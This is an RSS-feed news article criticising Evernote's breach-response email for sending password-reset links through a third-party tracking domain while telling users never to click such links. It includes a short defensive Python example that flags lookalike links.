			<content:encoded><![CDATA[ <p>Apple, Facebook and Twitter have all been the target of hackers recently, and now Evernote has admitted to a potential breach that has forced it to reset the passwords of approximately 50 million registered users. Evernote, a kind of web scrapbook that enables you to take notes, save web pages and web page content, sync files across devices and share ideas with friends and colleagues, did the right thing in notifying users and resetting passwords. However, it did the right thing in the wrong way; and here's why.</p>

<p>I received an email last night informing me that:</p>

<blockquote>
  <p>Evernote's Operations &amp; Security team has discovered and blocked suspicious activity on the Evernote network that appears to have been a coordinated attempt to access secure areas of the Evernote Service.</p>
</blockquote>

<p><img src="/attachments/fetch/L2ltYWdlcy9hdHRhY2htZW50cy8wL2R3ZWJldm5vdGUuanBn/300" alt="dwebevnote" title="align-right" /><br />
This immediately sought to put my mind, and that of the 49,999,999 other people reading the communication, at rest by assuring me that Evernote was taking this seriously enough to implement an across the board password reset. This despite there being no evidence, as yet, that any of my Evernote content had been accessed, changed or stolen. Evernote also told me that no payment information for 'premium' or 'business' customers had been accessed. So far so good, you may be thinking.</p>

<p>The bad news is that the breach investigation does reveal that the hackers were able to gain access to usernames and the emails associated with them (sound familiar yet folks?) and, yes, those all important passwords. In the case of Evernote these passwords are hashed and salted, which makes offline cracking far slower than it would be for plaintext or unsalted hashes, though weak passwords will still fall to a dictionary attack given time, so once again Evernote was taking no chances and the email says:</p>

<p>"in an abundance of caution, we are requiring all users to reset their Evernote account passwords. Please create a new password by signing into your account on evernote.com."</p>

<p>Again, so far so much better, you are probably muttering and wondering what the 'farce' angle is. Well, if you examine the link in the email to reset your password (as you always should before clicking anything as scammers and cyber-criminals can be quite clever in their presentation of mis-information)  you will see that it takes you to a page at:</p>

<p><code><a href="http://links.evernote.mkt5371.com" rel="nofollow">http://links.evernote.mkt5371.com</a></code></p>

<p>That's not the full URL; the actual link is different for each user, with a long string of characters after the host that look meaningless to the casual observer. The point is that this kind of URL looks remarkably like the obfuscated variety that phishers and their ilk use to fool users into clicking: it starts with something that includes the product or service name but is not the product or service's own domain. Read the host right to left and the registrable domain is mkt5371.com, with 'links.evernote' merely a subdomain under it. So in this case the link text in the email states 'evernote.com' but actually points to 'links.evernote.mkt5371.com', which is a totally different kettle of fish and raises alarm bells with anyone who has been properly schooled in taking security seriously.</p>
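<p>As an added example, rather than anything from Evernote, here is the check the paragraph above applies by eye, written in Python: pull the host out of the href, reduce it to its registrable domain, and compare that against both the expected brand domain and whatever domain the visible link text shows. The path after the host is a constructed placeholder (the real per-user string is not reproduced), the function names are this example's own, and the two-label registrable-domain rule is a deliberate simplification that a real implementation would replace with the Public Suffix List.</p>

```python
import re
from urllib.parse import urlsplit


def registrable_domain(host):
    """Last two labels of a host name. Deliberately simple: correct for .com
    hosts like the ones here, wrong for co.uk-style suffixes, where the
    Public Suffix List is the right tool."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


# Something that looks like a host name inside the visible link text.
DOMAIN_IN_TEXT = re.compile(r"([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})")


def link_findings(href, link_text, expected_domain):
    """Reasons a password-reset style link deserves a second look; an empty
    list means the link really goes where it appears to go."""
    reasons = []
    href_host = host_of(href)
    href_reg = registrable_domain(href_host)
    brand = expected_domain.split(".")[0]

    if href_reg != expected_domain:
        reasons.append("href lands on %s, not %s" % (href_reg, expected_domain))
        # The lookalike pattern: the brand survives only as a subdomain label
        # of someone else's registrable domain.
        if brand in href_host.split("."):
            reasons.append("'%s' is only a subdomain label under %s" % (brand, href_reg))

    shown = DOMAIN_IN_TEXT.search(link_text.lower())
    if shown and registrable_domain(shown.group(1)) != href_reg:
        reasons.append("text shows %s but href goes to %s" % (shown.group(1), href_host))
    return reasons


# Constructed anchors: the host from the email with a placeholder path, a
# genuine evernote.com login link, and the same link with neutral text.
ANCHORS = [
    ("http://links.evernote.mkt5371.com/example-path", "evernote.com"),
    ("https://www.evernote.com/Login.action", "evernote.com"),
    ("https://www.evernote.com/Login.action", "Reset your password"),
]


def check_anchors(anchors=ANCHORS, expected_domain="evernote.com"):
    """Pair each anchor's href with its findings."""
    return [(href, link_findings(href, text, expected_domain)) for href, text in anchors]


if __name__ == "__main__":
    for href, reasons in check_anchors():
        print(href)
        for r in reasons or ["looks consistent"]:
            print("   ", r)
```

<p>The first anchor trips all three checks, which is exactly the profile of a phishing link, even though in Evernote's case it was a legitimate mailing-list tracker. That is the practical lesson: a third-party click-tracking domain is indistinguishable from a lookalike to the recipient, so a breach notice should link to the service's own domain or, better, tell the user to type it.</p>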

<p><img src="/attachments/fetch/L2ltYWdlcy9hdHRhY2htZW50cy8wL2R3ZWJldm5vdGUwMi5qcGc%3D/327" alt="dwebevnote02" title="dwebevnote02" /></p>

<p>The real farce starts when you continue reading the email and discover that amongst the "several important steps that you can take to ensure that your data on any site, including Evernote, is secure" which the security team helpfully have provided there is, right there at number three on the list:</p>

<p>"Never click on 'reset password' requests in emails - instead go directly to the service"</p>

<p><img src="/attachments/fetch/L2ltYWdlcy9hdHRhY2htZW50cy8wL2R3ZWJldm5vdGUwMy5qcGc%3D/323" alt="dwebevnote03" title="dwebevnote03" /></p>

<p>Sorry Evernote, you get kudos for doing the right thing but I'm afraid that you have shot yourself in both feet for doing it in the wrong way. It's important that you eat your own dog food in the security business, that is you yourselves follow the advice that you give others, and in this case you didn't.</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>happygeek</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/449120/evernote-hack-turns-into-security-advice-farce</guid>
		</item>
			</channel>
</rss>